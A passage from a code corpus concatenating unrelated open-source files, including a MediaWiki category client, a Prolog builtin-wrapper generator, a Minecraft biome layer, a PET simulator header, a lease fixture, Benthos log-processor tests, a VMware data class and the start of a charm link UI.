                            .put("key2"))
                    .put("key", "value");

            MongoCollection<Document> collection = database.getCollection(tableName, Document.class);
            collection.insertOne(Document.parse(json.toString()));
        }
    }
}
|
xuericlin/wikum
|
wikum-env3/lib/python3.7/site-packages/wikitools/category.py
|
# -*- coding: utf-8 -*-
# Copyright 2008-2016 <NAME> (<EMAIL>)
# This file is part of wikitools.
# wikitools is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# wikitools is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with wikitools. If not, see <http://www.gnu.org/licenses/>.
from wikitools.pagelist import makePage
from . import api
from . import page
class Category(page.Page):
    """A category on the wiki (namespace 14)."""

    def __init__(self, site, title=None, check=True, followRedir=True, section=None, sectionnumber=None, pageid=None):
        """
        site - A wiki object
        title - The page title, as a string or unicode object
        check - Checks for existence, normalizes title, required for most things
        followRedir - follow redirects (check must be true)
        section - the section name
        sectionnumber - the section number
        pageid - pageid, can be in place of title
        """
        page.Page.__init__(self, site=site, title=title, check=check, followRedir=followRedir, section=section, sectionnumber=sectionnumber, pageid=pageid)
        # Cached result of getCategoryInfo(); empty until first queried.
        self.info = {}
        # Force the title into the Category namespace if it is not already.
        if self.namespace != 14:
            self.setNamespace(14, check)

    def getCategoryInfo(self, force=False):
        """Get some basic information about a category

        force - if True, bypass the cached result and re-query the API

        Returns a dict with:
        size - Total number of items in the category
        pages - Number of ordinary pages
        files - Number of files
        subcats - Number of subcategories
        """
        # BUG FIX: this previously read "not Force" (undefined, capitalized name),
        # which raised NameError whenever a cached result existed.
        if self.info and not force:
            return self.info
        params = {'action':'query',
            'prop':'categoryinfo',
            'titles':self.title
        }
        req = api.APIRequest(self.site, params)
        res = req.query(False)
        key = list(res['query']['pages'].keys())[0]
        self.info = res['query']['pages'][key]['categoryinfo']
        return self.info

    def getAllMembers(self, titleonly=False, reload=False, namespaces=None):
        """Gets a list of pages in the category

        titleonly - set to True to only create a list of strings,
        else it will be a list of Page objects
        reload - Deprecated, unused
        namespaces - List of namespaces to restrict to

        Any changes to getAllMembers functions should also be made to getUsage in category
        """
        members = []
        for member in self.__getMembersInternal(namespaces, self.site.limit):
            if titleonly:
                members.append(member.title)
            else:
                members.append(member)
        return members

    def getAllMembersGen(self, titleonly=False, reload=False, namespaces=None):
        """Generator function for pages in the category

        titleonly - set to True to yield strings,
        else it will yield Page objects
        reload - Deprecated, unused
        namespaces - List of namespaces to restrict to
        """
        for member in self.__getMembersInternal(namespaces, 50):
            if titleonly:
                yield member.title
            else:
                yield member

    def __getMembersInternal(self, namespaces, limit):
        # Query the categorymembers list API, yielding Page objects lazily.
        if 'continue' not in self.site.features:
            # NOTE(review): `exceptions` is never imported in this module, so this
            # raise would itself fail with NameError if reached; likely needs an
            # import of the wikitools exceptions module — confirm against the package.
            raise exceptions.UnsupportedError("MediaWiki 1.21+ is required for this function")
        params = {'action':'query',
            'list':'categorymembers',
            'cmtitle':self.title,
            'cmlimit':limit,
        }
        if namespaces is not None:
            params['cmnamespace'] = '|'.join([str(ns) for ns in namespaces])
        req = api.APIRequest(self.site, params)
        for data in req.queryGen():
            for item in data['query']['categorymembers']:
                yield makePage(item, self.site, False)

    def __getattr__(self, name):
        """Computed attributes:
        members
        """
        if name != 'members':
            return super().__getattr__(name)
        return self.getAllMembers()
|
ForoughA/CORGI
|
testnet/prolog/builtin/register.py
|
<gh_stars>10-100
import py
from prolog.interpreter.parsing import TermBuilder
from prolog.interpreter import helper, term, error
from prolog.interpreter.signature import Signature
from prolog.interpreter.arithmetic import eval_arithmetic
from rpython.rlib.objectmodel import we_are_translated
from rpython.rlib import jit
import inspect
Signature.register_extr_attr("builtin")
jit_modules = ["control"]
class Builtin(object):
    """Descriptor for one builtin predicate: pairs the generated wrapper
    function with its name, arity and signature."""
    _immutable_ = True  # RPython hint: fields never change after __init__

    def __init__(self, function, name, numargs, signature):
        self.function = function
        self.name = name
        self.numargs = numargs
        self.signature = signature

    def call(self, engine, query, rule, scont, fcont, heap, sister_rule = None):
        """Invoke the wrapped builtin; tags any catchable Prolog error with
        this builtin's signature for error reporting."""
        try:
            return self.function(engine, query, rule, scont, fcont, heap, sister_rule)
        except error.CatchableError as e:
            e.sig_context = self.signature
            raise

    def _freeze_(self):
        # RPython translation hook: treat instances as prebuilt constants.
        return True
def expose_builtin(*args, **kwargs):
    """Decorator factory that registers a function as a Prolog builtin.

    All arguments are forwarded unchanged to make_wrapper.
    """
    def _decorator(func):
        return make_wrapper(func, *args, **kwargs)
    return _decorator
def make_wrapper(func, name, unwrap_spec=[], handles_continuation=False,
                 translatable=True, needs_module=False, needs_rule=False, needs_sister = False):
    # Generates (via exec, Python 2 style) a wrapper function that unwraps the
    # Prolog query arguments according to unwrap_spec, calls `func`, and
    # registers the result as a Builtin under every name in `name`.
    #
    # unwrap_spec entries: "obj", "callable", "raw", "int", "atom",
    # "arithmetic", "list", "stream", "instream", "outstream".
    numargs = len(unwrap_spec)
    if isinstance(name, list):
        # First name is the canonical one; the rest are aliases.
        expose_as = name
        name = name[0]
    else:
        expose_as = [name]
    if not name.isalnum():
        # Operator-like names (e.g. "=..") cannot appear in a def statement;
        # fall back to the Python function's own name.
        name = func.func_name
    orig_funcargs = inspect.getargs(func.func_code)[0]
    funcname = "wrap_%s_%s" % (name, numargs)
    # Build the wrapper source line by line.
    code = ["def %s(engine, query, rule, scont, fcont, heap, sister_rule):" % (funcname, )]
    code.append("    module = rule.module")
    if not translatable:
        code.append("    if we_are_translated():")
        code.append("        raise error.UncatchableError('%s does not work in translated version')" % (name, ))
    subargs = ["engine", "heap"]
    # The wrapped function must follow the (engine, heap, ...) convention.
    assert orig_funcargs[0] == "engine"
    assert orig_funcargs[1] == "heap"
    code.append("    assert isinstance(query, term.Callable)")
    # Emit unwrapping code for each declared argument.
    for i, spec in enumerate(unwrap_spec):
        varname = "var%s" % (i, )
        subargs.append(varname)
        if spec in ("obj", "callable", "int", "atom", "arithmetic", "instream", "outstream", "stream", "list"):
            code.append("    %s = query.argument_at(%s).dereference(heap)" %
                        (varname, i))
        if spec in ("int", "atom", "arithmetic", "list", "instream", "outstream", "stream"):
            # These specs require a bound term: unbound variables are an error.
            code.append(
                "    if isinstance(%s, term.Var):" % (varname,))
            code.append(
                "        error.throw_instantiation_error()")
        if spec == "obj":
            pass
        elif spec == "callable":
            code.append(
                "    if not isinstance(%s, term.Callable):" % (varname,))
            code.append(
                "        if isinstance(%s, term.Var):" % (varname,))
            code.append(
                "            error.throw_instantiation_error()")
            code.append(
                "        error.throw_type_error('callable', %s)" % (varname,))
        elif spec == "raw":
            # "raw" passes the argument through without dereferencing.
            code.append("    %s = query.argument_at(%s)" % (varname, i))
        elif spec == "int":
            code.append("    %s = helper.unwrap_int(%s)" % (varname, varname))
        elif spec == "atom":
            code.append("    %s = helper.unwrap_atom(%s)" % (varname, varname))
        elif spec == "arithmetic":
            code.append("    %s = eval_arithmetic(engine, %s)" %
                        (varname, varname))
        elif spec == "list":
            code.append("    %s = helper.unwrap_list(%s)" % (varname, varname))
        elif spec == "stream":
            code.append("    %s = helper.unwrap_stream(engine, %s)" % (varname, varname))
        elif spec == "instream":
            code.append("    %s = helper.unwrap_instream(engine, %s)" % (varname, varname))
        elif spec == "outstream":
            code.append("    %s = helper.unwrap_outstream(engine, %s)" % (varname, varname))
        else:
            assert 0, "not implemented " + spec
    # Optional extra parameters; insertion position 2 matches the expected
    # position in the wrapped function's own argument list.
    if needs_module:
        subargs.insert(2, "module")
        assert orig_funcargs[2] == "module"
    if needs_rule:
        subargs.insert(2, "rule")
        assert orig_funcargs[2] == "rule"
    if handles_continuation:
        subargs.append("scont")
        subargs.append("fcont")
        assert orig_funcargs[subargs.index("scont")] == "scont"
        assert orig_funcargs[subargs.index("fcont")] == "fcont"
    if needs_sister:
        subargs.append("sister_rule")
    call = "    result = %s(%s)" % (func.func_name, ", ".join(subargs))
    code.append(call)
    if not handles_continuation:
        # Builtins that do not manage continuations implicitly succeed.
        code.append("    return scont, fcont, heap")
    else:
        code.append("    return result")
    # Compile the generated wrapper with a minimal, explicit globals dict.
    used_globals = ["helper", "error", "term", "eval_arithmetic"]
    miniglobals = {key: globals()[key] for key in used_globals}
    miniglobals[func.func_name] = func
    exec py.code.Source("\n".join(code)).compile() in miniglobals
    # Register the wrapper as a Builtin under every exposed name/arity.
    for name in expose_as:
        signature = Signature.getsignature(name, numargs)
        b = Builtin(miniglobals[funcname], funcname, numargs, signature)
        signature.set_extra("builtin", b)
    # Return the original function unchanged so it stays usable as a decorator.
    return func
|
NViper21/ZeroQuest
|
1.7.10-src/common/zeroquest/world/gen/layer/GenLayerRareNileBiome.java
|
package common.zeroquest.world.gen.layer;
import common.zeroquest.ModBiomes;
import net.minecraft.world.gen.layer.GenLayer;
import net.minecraft.world.gen.layer.IntCache;
public class GenLayerRareNileBiome extends GenLayer
{
    private static final String __OBFID = "CL_00000562";

    public GenLayerRareNileBiome(long seed, GenLayer parentLayer)
    {
        super(seed);
        this.parent = parentLayer;
    }

    /**
     * Returns a list of integer values generated by this layer. These may be interpreted as temperatures, rainfall
     * amounts, or biomeList[] indices based on the particular GenLayer subclass.
     *
     * Copies the parent layer's biome ids, replacing roughly 1-in-57 redSeed
     * cells with the rare variant id (redSeed + 128).
     */
    public int[] getInts(int areaX, int areaY, int areaWidth, int areaHeight)
    {
        // Parent area is fetched with a 1-cell border on every side.
        int[] parentInts = this.parent.getInts(areaX - 1, areaY - 1, areaWidth + 2, areaHeight + 2);
        int[] result = IntCache.getIntCache(areaWidth * areaHeight);

        for (int row = 0; row < areaHeight; ++row)
        {
            for (int col = 0; col < areaWidth; ++col)
            {
                this.initChunkSeed((long)(col + areaX), (long)(row + areaY));
                int biomeId = parentInts[col + 1 + (row + 1) * (areaWidth + 2)];

                // nextInt is always invoked exactly once per cell so the RNG
                // sequence matches regardless of the biome found.
                if (this.nextInt(57) == 0 && biomeId == ModBiomes.redSeed.biomeID)
                {
                    result[col + row * areaWidth] = ModBiomes.redSeed.biomeID + 128;
                }
                else
                {
                    result[col + row * areaWidth] = biomeId;
                }
            }
        }

        return result;
    }
}
|
dfreese/Gray
|
include/Gray/Daq/DaqModel.h
|
/*
* Gray: A Ray Tracing-based Monte Carlo Simulator for PET
*
* Copyright (c) 2018, <NAME>, <NAME>, <NAME>, <NAME>
*
* This software is distributed under the terms of the MIT License unless
* otherwise noted. See LICENSE for further details.
*
*/
#ifndef DaqModel_h
#define DaqModel_h
#include <fstream>
#include <functional>
#include <iostream>
#include <map>
#include <memory>
#include <sstream>
#include <utility>
#include <vector>
#include "Gray/Physics/Interaction.h"
#include "Gray/Daq/DaqStats.h"
#include "Gray/Daq/Process.h"
#include "Gray/Daq/ProcessFactory.h"
#include "Gray/Daq/ProcessStats.h"
class DaqModel {
public:
    // Type aliases re-exported from Process for convenience.
    using EventT = Process::EventT;
    using ContainerT = Process::ContainerT;
    using EventIter = Process::EventIter;
    using TimeT = Process::TimeT;
    using DetIdT = Process::DetIdT;

    //! initial_sort_window: time window used for the initial event sort
    //! (defaults to -1; semantics defined in the implementation).
    DaqModel(TimeT initial_sort_window = -1);

    //! Access to the internal event buffer.
    ContainerT& get_buffer();
    //! Feed a batch of simulated interactions into the model.
    void consume(std::vector<Interaction> inters);

    //! Configure the processing chain from textual process descriptions.
    int set_processes(const std::vector<std::string> & lines,
                      const Mapping::IdMappingT& mapping);
    //! Configure the processing chain from a file of process descriptions.
    int load_processes(const std::string & filename,
                       const Mapping::IdMappingT& mapping);

    // Counters over the configured chain and processed events.
    size_t no_processes() const;
    size_t no_coinc_processes() const;
    long no_events() const;
    long no_kept() const;
    long no_dropped() const;
    long no_merged() const;
    long no_filtered() const;
    long no_deadtimed() const;

    friend std::ostream & operator << (std::ostream & os, const DaqModel & s);

    // Iterators over the hit / singles / coincidence stages of the buffer.
    EventIter hits_begin();
    EventIter hits_end();
    EventIter singles_begin();
    EventIter singles_end();
    EventIter coinc_begin();
    EventIter coinc_end();

    // Run each stage of the chain; stop_* flush/finalize a stage.
    void process_hits();
    void process_singles();
    void process_coinc(size_t idx);
    void stop_hits();
    void stop_singles();
    void stop_coinc(size_t idx);
    //! Drop events that every stage has finished with.
    void clear_complete();
    DaqStats stats() const;

private:
    using ProcessDescription = ProcessFactory::ProcessDescription;
    int set_processes(
            const std::vector<ProcessDescription> & process_descriptions,
            const Mapping::IdMappingT& mapping);
    void add_process(std::unique_ptr<Process> process, bool proc_print_info);
    std::vector<std::pair<std::shared_ptr<const Process>, ProcessStats>> processes;
    std::vector<std::pair<std::shared_ptr<const Process>, ProcessStats>> coinc_processes;
    //! Tells if a given process in processes should be printed
    std::vector<bool> print_info;
    ContainerT input_events;
    // Per-process distance into input_events up to which events are ready.
    std::vector<ContainerT::difference_type> process_ready_distance;
    ContainerT::difference_type min_coinc_ready_dist;
    EventIter singles_ready;
    EventIter coinc_ready;
    EventIter begin();
    EventIter end();
    // Stage completion flags set by the stop_* methods.
    bool hits_stopped = false;
    bool singles_stopped = false;
    bool coinc_stopped = false;
};
#endif // DaqModel_h
|
dubdabasoduba/estatio
|
estatioapp/fixture/src/main/java/org/estatio/fixture/lease/LeaseForOxfTopModel001Gb.java
|
/*
*
* Copyright 2012-2014 Eurocommercial Properties NV
*
*
* Licensed under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.estatio.fixture.lease;
import java.util.SortedSet;
import javax.inject.Inject;
import org.estatio.dom.agreement.AgreementRole;
import org.estatio.dom.agreement.AgreementRoleCommunicationChannelType;
import org.estatio.dom.agreement.AgreementRoleCommunicationChannelTypeRepository;
import org.estatio.dom.agreement.AgreementRoleTypeRepository;
import org.estatio.dom.communicationchannel.CommunicationChannel;
import org.estatio.dom.communicationchannel.CommunicationChannelType;
import org.estatio.dom.communicationchannel.CommunicationChannels;
import org.estatio.dom.lease.Lease;
import org.estatio.dom.lease.LeaseConstants;
import org.estatio.dom.lease.tags.BrandCoverage;
import org.estatio.dom.party.Party;
import org.estatio.fixture.asset.PropertyForOxfGb;
import org.estatio.fixture.geography.CountriesRefData;
import org.estatio.fixture.party.OrganisationForHelloWorldGb;
import org.estatio.fixture.party.OrganisationForTopModelGb;
import org.estatio.fixture.party.PersonForGinoVannelliGb;
import static org.estatio.integtests.VT.ld;
public class LeaseForOxfTopModel001Gb extends LeaseAbstract {

    public static final String REF = "OXF-TOPMODEL-001";
    public static final String UNIT_REF = PropertyForOxfGb.unitReference("001");

    public static final String PARTY_REF_LANDLORD = OrganisationForHelloWorldGb.REF;
    public static final String PARTY_REF_TENANT = OrganisationForTopModelGb.REF;

    public static final String BRAND = "Topmodel";
    public static final BrandCoverage BRAND_COVERAGE = BrandCoverage.NATIONAL;
    public static final String COUNTRY_OF_ORIGIN_REF = CountriesRefData.GBR;

    @Inject
    private AgreementRoleTypeRepository agreementRoleTypeRepository;

    @Inject
    private AgreementRoleCommunicationChannelTypeRepository agreementRoleCommunicationChannelTypeRepository;

    @Inject
    private CommunicationChannels communicationChannels;

    @Override
    protected void execute(ExecutionContext executionContext) {

        // prereqs
        if (isExecutePrereqs()) {
            // BUG FIX: PersonForGinoVannelliGb was previously executed twice here.
            executionContext.executeChild(this, new PersonForGinoVannelliGb());
            executionContext.executeChild(this, new OrganisationForHelloWorldGb());
            executionContext.executeChild(this, new OrganisationForTopModelGb());
            executionContext.executeChild(this, new PropertyForOxfGb());
        }

        // exec
        Party manager = parties.findPartyByReference(PersonForGinoVannelliGb.REF);
        Lease lease = createLease(
                REF,
                "Topmodel Lease",
                UNIT_REF,
                BRAND,
                BRAND_COVERAGE,
                COUNTRY_OF_ORIGIN_REF,
                "FASHION",
                "WOMEN",
                PARTY_REF_LANDLORD,
                PARTY_REF_TENANT,
                ld(2010, 7, 15),
                ld(2022, 7, 14),
                true,
                true,
                manager,
                executionContext);
        createAddress(lease, LeaseConstants.ARCCT_ADMINISTRATION_ADDRESS);
        createAddress(lease, LeaseConstants.ARCCT_INVOICE_ADDRESS);
    }

    /**
     * Attaches the tenant's first postal address to the lease's tenant role
     * under the given communication-channel type.
     */
    private void createAddress(Lease lease, String addressType) {
        AgreementRole agreementRole = lease.findRoleWithType(agreementRoleTypeRepository.findByTitle(LeaseConstants.ART_TENANT), ld(2010, 7, 15));
        AgreementRoleCommunicationChannelType agreementRoleCommunicationChannelType = agreementRoleCommunicationChannelTypeRepository
                .findByTitle(addressType);
        final SortedSet<CommunicationChannel> channels = communicationChannels.findByOwnerAndType(lease.getSecondaryParty(), CommunicationChannelType.POSTAL_ADDRESS);
        final CommunicationChannel postalAddress = channels.first();
        agreementRole.addCommunicationChannel(agreementRoleCommunicationChannelType, postalAddress, null);
    }
}
|
DIMO-Network/benthos
|
internal/impl/pure/processor_log_test.go
|
package pure_test
import (
"fmt"
"reflect"
"testing"
"github.com/stretchr/testify/assert"
"github.com/stretchr/testify/require"
"github.com/benthosdev/benthos/v4/internal/bundle/mock"
"github.com/benthosdev/benthos/v4/internal/log"
"github.com/benthosdev/benthos/v4/internal/message"
"github.com/benthosdev/benthos/v4/internal/old/processor"
)
// mockLog implements log.Modular, capturing each formatted message per level
// so tests can assert on exactly what was logged.
type mockLog struct {
	traces []string
	debugs []string
	infos  []string
	warns  []string
	errors []string

	fields        []map[string]string
	mappingFields []interface{}
}

// NewModule returns the same mock so all module output is captured together.
func (m *mockLog) NewModule(prefix string) log.Modular { return m }

// WithFields records the fields and returns the same mock.
func (m *mockLog) WithFields(fields map[string]string) log.Modular {
	m.fields = append(m.fields, fields)
	return m
}

// With records key/value pairs and returns the same mock.
func (m *mockLog) With(args ...interface{}) log.Modular {
	m.mappingFields = append(m.mappingFields, args...)
	return m
}

// Fatalf is a no-op: the mock must never terminate the test process.
func (m *mockLog) Fatalf(format string, v ...interface{}) {}

func (m *mockLog) Errorf(format string, v ...interface{}) {
	m.errors = append(m.errors, fmt.Sprintf(format, v...))
}
func (m *mockLog) Warnf(format string, v ...interface{}) {
	m.warns = append(m.warns, fmt.Sprintf(format, v...))
}
func (m *mockLog) Infof(format string, v ...interface{}) {
	m.infos = append(m.infos, fmt.Sprintf(format, v...))
}
func (m *mockLog) Debugf(format string, v ...interface{}) {
	m.debugs = append(m.debugs, fmt.Sprintf(format, v...))
}
func (m *mockLog) Tracef(format string, v ...interface{}) {
	m.traces = append(m.traces, fmt.Sprintf(format, v...))
}

// Fatalln is a no-op for the same reason as Fatalf.
func (m *mockLog) Fatalln(message string) {}

func (m *mockLog) Errorln(message string) {
	m.errors = append(m.errors, message)
}
func (m *mockLog) Warnln(message string) {
	m.warns = append(m.warns, message)
}
func (m *mockLog) Infoln(message string) {
	m.infos = append(m.infos, message)
}
func (m *mockLog) Debugln(message string) {
	m.debugs = append(m.debugs, message)
}
func (m *mockLog) Traceln(message string) {
	m.traces = append(m.traces, message)
}
// TestLogBadLevel verifies that building a log processor with an
// unrecognised level string fails at construction time.
func TestLogBadLevel(t *testing.T) {
	conf := processor.NewConfig()
	conf.Type = "log"
	conf.Log.Level = "does not exist"

	_, err := mock.NewManager().NewProcessor(conf)
	if err == nil {
		t.Error("expected err from bad log level")
	}
}
// TestLogLevelTrace runs one message through the processor at every level and
// checks that (a) messages pass through unchanged and (b) exactly one entry
// lands in the matching level bucket of the shared mockLog recorder.
func TestLogLevelTrace(t *testing.T) {
	conf := processor.NewConfig()
	conf.Type = "log"
	// The logged message is the "foo" field of the input JSON, i.e. the level name.
	conf.Log.Message = "${!json(\"foo\")}"

	logMock := &mockLog{}

	levels := []string{"TRACE", "DEBUG", "INFO", "WARN", "ERROR"}
	for _, level := range levels {
		conf.Log.Level = level
		mgr := mock.NewManager()
		mgr.L = logMock
		l, err := mgr.NewProcessor(conf)
		if err != nil {
			t.Fatal(err)
		}

		input := message.QuickBatch([][]byte{[]byte(fmt.Sprintf(`{"foo":"%v"}`, level))})
		expMsgs := []*message.Batch{input}
		actMsgs, res := l.ProcessMessage(input)
		if res != nil {
			t.Fatal(res)
		}
		// The log processor must be a pure passthrough for the batch itself.
		if !reflect.DeepEqual(expMsgs, actMsgs) {
			t.Errorf("Wrong message passthrough: %v != %v", actMsgs, expMsgs)
		}
	}

	// Each bucket should hold exactly the one message logged at its level.
	if exp, act := []string{"TRACE"}, logMock.traces; !reflect.DeepEqual(exp, act) {
		t.Errorf("Wrong log for trace: %v != %v", act, exp)
	}
	if exp, act := []string{"DEBUG"}, logMock.debugs; !reflect.DeepEqual(exp, act) {
		t.Errorf("Wrong log for debug: %v != %v", act, exp)
	}
	if exp, act := []string{"INFO"}, logMock.infos; !reflect.DeepEqual(exp, act) {
		t.Errorf("Wrong log for info: %v != %v", act, exp)
	}
	if exp, act := []string{"WARN"}, logMock.warns; !reflect.DeepEqual(exp, act) {
		t.Errorf("Wrong log for warn: %v != %v", act, exp)
	}
	if exp, act := []string{"ERROR"}, logMock.errors; !reflect.DeepEqual(exp, act) {
		t.Errorf("Wrong log for error: %v != %v", act, exp)
	}
}
// TestLogWithFields checks that static and interpolated log fields are
// resolved per message and recorded once per processed batch.
func TestLogWithFields(t *testing.T) {
	conf := processor.NewConfig()
	conf.Type = "log"
	conf.Log.Message = "${!json(\"foo\")}"
	// "static" is constant; "dynamic" is re-resolved from each message.
	conf.Log.Fields = map[string]string{
		"static":  "foo",
		"dynamic": "${!json(\"bar\")}",
	}

	logMock := &mockLog{}

	conf.Log.Level = "INFO"
	mgr := mock.NewManager()
	mgr.L = logMock
	l, err := mgr.NewProcessor(conf)
	if err != nil {
		t.Fatal(err)
	}

	// First message: expect passthrough plus one INFO entry and one field set.
	input := message.QuickBatch([][]byte{[]byte(`{"foo":"info message","bar":"with fields"}`)})
	expMsgs := []*message.Batch{input}
	actMsgs, res := l.ProcessMessage(input)
	if res != nil {
		t.Fatal(res)
	}
	if !reflect.DeepEqual(expMsgs, actMsgs) {
		t.Errorf("Wrong message passthrough: %v != %v", actMsgs, expMsgs)
	}
	if exp, act := []string{"info message"}, logMock.infos; !reflect.DeepEqual(exp, act) {
		t.Errorf("Wrong log output: %v != %v", act, exp)
	}
	t.Logf("Checking %v\n", logMock.fields)
	if exp, act := 1, len(logMock.fields); exp != act {
		t.Fatalf("Wrong count of fields: %v != %v", act, exp)
	}
	if exp, act := map[string]string{"dynamic": "with fields", "static": "foo"}, logMock.fields[0]; !reflect.DeepEqual(exp, act) {
		t.Errorf("Wrong field output: %v != %v", act, exp)
	}

	// Second message: recorder accumulates, so expect two entries and two
	// field sets, with the dynamic field re-resolved.
	input = message.QuickBatch([][]byte{[]byte(`{"foo":"info message 2","bar":"with fields 2"}`)})
	expMsgs = []*message.Batch{input}
	actMsgs, res = l.ProcessMessage(input)
	if res != nil {
		t.Fatal(res)
	}
	if !reflect.DeepEqual(expMsgs, actMsgs) {
		t.Errorf("Wrong message passthrough: %v != %v", actMsgs, expMsgs)
	}
	if exp, act := []string{"info message", "info message 2"}, logMock.infos; !reflect.DeepEqual(exp, act) {
		t.Errorf("Wrong log output: %v != %v", act, exp)
	}
	t.Logf("Checking %v\n", logMock.fields)
	if exp, act := 2, len(logMock.fields); exp != act {
		t.Fatalf("Wrong count of fields: %v != %v", act, exp)
	}
	if exp, act := map[string]string{"dynamic": "with fields", "static": "foo"}, logMock.fields[0]; !reflect.DeepEqual(exp, act) {
		t.Errorf("Wrong field output: %v != %v", act, exp)
	}
	if exp, act := map[string]string{"dynamic": "with fields 2", "static": "foo"}, logMock.fields[1]; !reflect.DeepEqual(exp, act) {
		t.Errorf("Wrong field output: %v != %v", act, exp)
	}
}
// TestLogWithFieldsMapping checks that a Bloblang fields_mapping is evaluated
// against the message and its results passed (flattened, key-sorted) to the
// logger's With method.
func TestLogWithFieldsMapping(t *testing.T) {
	conf := processor.NewConfig()
	conf.Type = "log"
	conf.Log.Message = "hello world"
	conf.Log.FieldsMapping = `
root.static = "static value"
root.age = this.age + 2
root.is_cool = this.is_cool`

	logMock := &mockLog{}

	conf.Log.Level = "INFO"
	mgr := mock.NewManager()
	mgr.L = logMock
	l, err := mgr.NewProcessor(conf)
	require.NoError(t, err)

	input := message.QuickBatch([][]byte{[]byte(
		`{"age":10,"is_cool":true,"ignore":"this value please"}`,
	)})
	expMsgs := []*message.Batch{input}
	actMsgs, res := l.ProcessMessage(input)
	require.Nil(t, res)
	assert.Equal(t, expMsgs, actMsgs)
	assert.Equal(t, []string{"hello world"}, logMock.infos)
	// Unmapped input keys ("ignore") must not appear; mapped keys arrive as
	// alternating key/value args in lexical key order.
	assert.Equal(t, []interface{}{
		"age", int64(12),
		"is_cool", true,
		"static", "static value",
	}, logMock.mappingFields)
}
|
jayavigneshksd/yavijava
|
src/main/java/com/vmware/vim25/HostStorageDeviceInfo.java
|
<gh_stars>100-1000
/*================================================================================
Copyright (c) 2013 <NAME>. All Rights Reserved.
Redistribution and use in source and binary forms, with or without modification,
are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
* Neither the name of VMware, Inc. nor the names of its contributors may be used
to endorse or promote products derived from this software without specific prior
written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
IN NO EVENT SHALL VMWARE, INC. OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
================================================================================*/
package com.vmware.vim25;
/**
 * Describes the storage subsystem of a host: host bus adapters, SCSI LUNs,
 * SCSI and plug-store topology, multipathing state, and whether the software
 * iSCSI initiator is enabled.
 *
 * @author <NAME> (http://www.doublecloud.org)
 * @version 5.1
 */
@SuppressWarnings("all")
public class HostStorageDeviceInfo extends DynamicData {

    public HostHostBusAdapter[] hostBusAdapter;
    public ScsiLun[] scsiLun;
    public HostScsiTopology scsiTopology;
    public HostMultipathInfo multipathInfo;
    public HostPlugStoreTopology plugStoreTopology;
    public boolean softwareInternetScsiEnabled;

    public HostHostBusAdapter[] getHostBusAdapter() {
        return hostBusAdapter;
    }

    public void setHostBusAdapter(HostHostBusAdapter[] hostBusAdapter) {
        this.hostBusAdapter = hostBusAdapter;
    }

    public ScsiLun[] getScsiLun() {
        return scsiLun;
    }

    public void setScsiLun(ScsiLun[] scsiLun) {
        this.scsiLun = scsiLun;
    }

    public HostScsiTopology getScsiTopology() {
        return scsiTopology;
    }

    public void setScsiTopology(HostScsiTopology scsiTopology) {
        this.scsiTopology = scsiTopology;
    }

    public HostMultipathInfo getMultipathInfo() {
        return multipathInfo;
    }

    public void setMultipathInfo(HostMultipathInfo multipathInfo) {
        this.multipathInfo = multipathInfo;
    }

    public HostPlugStoreTopology getPlugStoreTopology() {
        return plugStoreTopology;
    }

    public void setPlugStoreTopology(HostPlugStoreTopology plugStoreTopology) {
        this.plugStoreTopology = plugStoreTopology;
    }

    public boolean isSoftwareInternetScsiEnabled() {
        return softwareInternetScsiEnabled;
    }

    public void setSoftwareInternetScsiEnabled(boolean softwareInternetScsiEnabled) {
        this.softwareInternetScsiEnabled = softwareInternetScsiEnabled;
    }
}
|
twpayne/charm
|
ui/link/link.go
|
<gh_stars>1000+
package link
import (
"fmt"
"github.com/charmbracelet/bubbles/spinner"
tea "github.com/charmbracelet/bubbletea"
"github.com/charmbracelet/charm/client"
"github.com/charmbracelet/charm/ui/charmclient"
"github.com/charmbracelet/charm/ui/common"
"github.com/charmbracelet/charm/ui/keygen"
"github.com/charmbracelet/lipgloss"
)
// viewStyle pads every rendered view (top 1, right 2, bottom 2, left 3).
var viewStyle = lipgloss.NewStyle().Padding(1, 2, 2, 3)

// NewProgram returns a Tea program for the link participant.
func NewProgram(cfg *client.Config, code string) *tea.Program {
	return tea.NewProgram(newModel(cfg, code))
}
// status enumerates the lifecycle states of the link participant, in rough
// chronological order from client init through keygen, token exchange, and a
// terminal success/failure state.
type status int

const (
	initCharmClient status = iota // building the charm client
	keygenRunning                 // generating SSH keys after an auth failure
	keygenFinished
	linkInit
	linkTokenSent
	linkTokenValid
	linkTokenInvalid
	linkRequestDenied
	linkSuccess
	linkTimeout
	linkErr
	quitting
)

// Messages emitted by the link-handler channels and consumed by Update.
type (
	tokenSentMsg     struct{}
	validTokenMsg    bool
	requestDeniedMsg struct{}
	successMsg       bool
	timeoutMsg       struct{}
	errMsg           struct{ err error }
